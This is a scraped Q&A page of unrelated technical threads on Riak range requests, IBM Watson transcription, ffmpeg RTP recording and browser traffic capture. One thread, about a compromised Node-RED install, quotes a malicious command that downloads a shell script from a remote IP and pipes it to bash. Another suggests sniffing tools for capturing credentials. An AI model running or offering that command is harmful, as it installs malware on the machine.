How to configure Riak 1.3.* to serve range requests (Accept-Ranges: bytes)

I'm trying to use Riak to store video content. I'm already able to push my video to Riak with the correct MIME type, and I can also retrieve the video by its URL.
The Riak page says that Riak 1.3.* is capable of supporting range requests.
But curl -I MYRIAKVIDEOURL doesn't return the Accept-Ranges: bytes HTTP header (unlike my Apache server). Also, when VLC tries a range request (by seeking to the middle of the video), no range request seems to be issued: loading takes a long time and the network monitor shows a lot of downloaded traffic. When I do the same with the video URL served by Apache (tried on the same machine), range requests work fine in VLC.
Does anyone have an idea how to achieve this with Riak (running on Debian 7, compiled from source; also tried on Ubuntu 12.04)? Can I manipulate the HTTP headers that Riak sends?
Thanks for the help.

Do you intend to use Riak itself? For storing video files, I think Riak CS is the better fit.
Riak CS supports the Range header for GET Object requests.
A sample request with s3curl looks like:
s3curl.pl -- -v -x localhost:8080 -H 'Range: bytes=1000-2000' \
http://yourbuckethere.s3.amazonaws.com/your/file/here
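Independent of which product you end up with, you can check whether an endpoint honors ranges by sending a Range header yourself and looking at the status code. This is a generic sketch; the URL is a placeholder for your own object URL:

```shell
# Generic range-request check (the URL below is a placeholder).
# A server that honors ranges replies 206 (Partial Content);
# one that ignores the header replies 200 with the full body.
code=$(curl -s -o /dev/null -w "%{http_code}" \
       -H "Range: bytes=0-1023" \
       "http://localhost:8080/yourbucket/your/file/here" || true)
echo "$code"
```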

Related

Terrible Watson transcription

I'm trying to use Watson to create the transcription of an audio file in Brazilian Portuguese. I made the call to the API and the result was returned successfully. But the transcription is beyond terrible. It's absolutely useless, with not a single word recognized correctly.
I used the following command:
curl -X POST -u "apikey:<key>" --header "Content-Type: audio/mp3" --data-binary @./file.mp3 \
"https://api.us-south.speech-to-text.watson.cloud.ibm.com/instances/<code>/v1/recognize?model=pt-BR_BroadbandModel"
The test audio is a 9-minute part of a 90-minute recording: an interview of a researcher with a dockworker, recorded on a cell phone. I have uploaded it here for examination: https://drive.google.com/file/d/1Xuibxksudp55uwaz6oSOccTZ3pP7Dya9/view?usp=sharing
It can't be that Watson produces such a terrible transcription. What am I missing? Do I have to set some parameter, or do some work on the audio first?
I also tried the narrowband model, and FLAC as well.
The Watson IBM API doesn't seem to be made for end users; its design is overcomplicated for plain transcription, and I believe it has a bug their team hasn't been able to track down.
It is, however, advisable to work with Google and the SpeechRecognition module:
pip install --upgrade SpeechRecognition (Linux/Unix systems)
or C:\path_to_python.exe -m pip install --upgrade SpeechRecognition (Windows)
This one module has built-in support for the different API providers such as IBM, Google, Microsoft, etc. Just use:
import speech_recognition as sr

r = sr.Recognizer()
with sr.AudioFile("path/to/audio/file") as source:
    # r.adjust_for_ambient_noise(source)  # if you have background noise
    audio = r.record(source)
Then recognize the recorded audio with
t = r.recognize_xxx(audio, credentials, ...)
where xxx is the API provider from a list: google, ibm, azure, or bing (with Microsoft).
Read up more on the module to be more precise; this is only a rough guide.

How to start the actual "Speech to text"?

I am a freelance author and have gathered tons of hours of interview material which needs to be transcribed.
While browsing the Internet I came across IBM Watson "Speech to text" which should be the ideal solution to handle that huge amount of spoken word.
After registration I am struggling with even opening it, since I am not very experienced with programming and the like.
Can someone provide an example with steps that I can follow to achieve my task?
Which platform do you want to use the Speech to Text service on?
If you are not a coder, then the best starting point for you will be Node-RED. Take a look at this tutorial that creates a translator - https://developer.ibm.com/tutorials/build-universal-translator-nodered-watson-ai-services/?cm_mmc=IBMDev--Digest--ENews2019-_-email&spMailingID=39408813&spUserID=MzYzODEwODAwNzk4S0&spJobID=1500992192&spReportId=MTUwMDk5MjE5MgS2
It uses Speech to Text, Translation, and Text to Speech; you will only need the Speech to Text part. Once you get it working with a microphone, you can use the file inject to push your own audio files through the service.
For larger files you will need to make use of http post and multi-parts, when you get to that point, raise a new question, tag it with node-red and someone will post a sample flow for you.
You do not need any programming knowledge to use Watson Speech to Text. You can just send your files to the service using the curl tool, which you can easily install on your computer; it is free.
Then you can send a file to the service running the following command:
curl -X POST -u "apikey:{apikey}" --header "Content-Type: audio/flac" --data-binary @audio-file2.flac "https://stream.watsonplatform.net/speech-to-text/api/v1/recognize"
You just need an apikey to run that command, which you can get following these steps: https://cloud.ibm.com/docs/services/watson?topic=watson-iam
Then just replace the .flac file in that command with the file you want to process, and pass the right value for the Content-Type header. For FLAC files it is audio/flac; for other audio formats the list is here: https://cloud.ibm.com/apidocs/speech-to-text
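The service answers with JSON rather than plain text. As a sketch (the response below is truncated to the shape documented for /v1/recognize, and the sample values are made up), you can pull out just the transcript like this, assuming you saved curl's output to response.json:

```shell
# Made-up sample of the documented /v1/recognize response shape,
# standing in for the file you saved from the curl call above.
cat > response.json <<'EOF'
{"results": [{"alternatives": [{"transcript": "hello world ", "confidence": 0.9}], "final": true}]}
EOF

# Print just the best transcript of each result.
python3 - <<'EOF'
import json

with open("response.json") as f:
    data = json.load(f)

# Each result holds one or more alternatives; take the first (best) one.
for result in data.get("results", []):
    if result.get("alternatives"):
        print(result["alternatives"][0]["transcript"].strip())
EOF
```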

Remove Multiple Node-Red Flows - Raspberry Pi LAMP Hack

I have a Raspberry Pi LAMP server which I use as a hobby. I also have Node-RED installed, which I use for ESP8266 sensors.
I looked at Node-RED today and there are possibly 40-50 flows added (which I did not create). They are all the same: a timestamp feeding into a message payload. The payload is
curl -s http://192.99.142.248:8220/mr.sh | bash -sh
The same as is reported here:
SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process
Does anyone know how I can delete all flows? Can I delete and clean install Node-Red? I don't have anything on the RPi which I need to keep. Thanks.
Please refer to this post on the Node-RED forum: https://discourse.nodered.org/t/malware-infecting-unsecured-node-red-servers/3460
This comes as a result of exposing Node-RED to the internet without applying any security.
Your safest course of action is to wipe the SD card and start with a clean system.
Make sure you enable security this time - details in the post linked above.
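If you only want to clear the flows before securing the install (a full wipe of the SD card, as suggested above, is still safer), Node-RED keeps its flows as JSON files in its user directory, which is ~/.node-red by default. A sketch, assuming the standard Raspberry Pi install:

```shell
# Stop Node-RED first; on the Raspberry Pi image the service scripts
# are node-red-stop and node-red-start (adjust for your own setup):
#   node-red-stop
rm -f ~/.node-red/flows*.json   # removes the flow files and their credentials
#   node-red-start
```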

How to receive H264 stream via RTP and store to file?

I'm trying to make a server that receives RTP/H264 video streams from android clients and stores these to file.
Currently I'm using VLC on the server, which works well. However, I am worried that VLC is a heavyweight solution that may not scale well. As I'm not actually playing the video, only saving it to file, I thought there must be a more efficient solution.
Currently I'm planning on using an Amazon ec2 instances, so the goal is to serve as many clients as possible per instance.
I'm flexible (willing to learn) on the language side, I'd like to choose the right language for the job.
So, does anyone know of a good, scalable way to store these streams to files?
Thanks in advance!
EDIT
FFmpeg or libav look promising. Looking into them now.
Basically you need a library that supports an RTP stack on the server side, so you can extract the payload and append it to a file as it arrives. ffmpeg is a great choice: it has an RTP stack, and it can also generate containers (MP4, ...) for you if needed. In fact, VLC uses ffmpeg's libav library under the hood.
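As a rough sketch of the ffmpeg route (the address, port, and payload type in the SDP are assumptions for a typical Android sender; adjust them to your stream), you describe the incoming RTP session in an SDP file and let ffmpeg copy the H.264 payload straight into an MP4 container without re-encoding:

```shell
# Describe the incoming RTP/H.264 session (placeholder address/port/payload type).
cat > stream.sdp <<'EOF'
v=0
o=- 0 0 IN IP4 0.0.0.0
s=Android H264 stream
c=IN IP4 0.0.0.0
t=0 0
m=video 5004 RTP/AVP 96
a=rtpmap:96 H264/90000
EOF

# Receive the stream and copy it into MP4 without re-encoding.
# The timeout is only here so the sketch terminates when no sender is
# running; drop it for a real recording session.
timeout 5 ffmpeg -protocol_whitelist file,udp,rtp -i stream.sdp -c copy -y out.mp4 || true
```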

Cache Outgoing Data from browser

This might be a very broad question, but here is what I want. I open a website and enter some details, like my login credentials or any other data that passes from my browser to the website. I want to cache (write to a temp file) whatever I send to that website. How can this be done? I tried to extract the data from the packets flowing out of my machine, but I found only junk characters (maybe headers). Any ideas are welcome. I am using Ubuntu Linux and would like to achieve this with a shell script, C, or C++.
One option would be to use the Fiddler Web Debugger which is scriptable (C#).
Although it's a Win32 program, it can act as a proxy for any Linux machine. See Debug traffic from another machine (even a Mac or Unix box) for details.
There's also a native Linux app called dsniff which can be used to log all HTTP traffic to a file.
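As another native Linux option, tcpdump can print packet payloads as ASCII, which makes plain-HTTP headers and form data readable (HTTPS payloads stay encrypted, which is why you only saw junk characters). The interface and the 5-second cap below are assumptions for a quick demo; for a real capture, run it as root without the timeout:

```shell
# Capture outgoing HTTP traffic and dump the payloads as readable ASCII.
# -A prints packet contents as ASCII, -s 0 captures full packets.
timeout 5 tcpdump -i any -A -s 0 'tcp port 80' > http_out.txt || true
```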
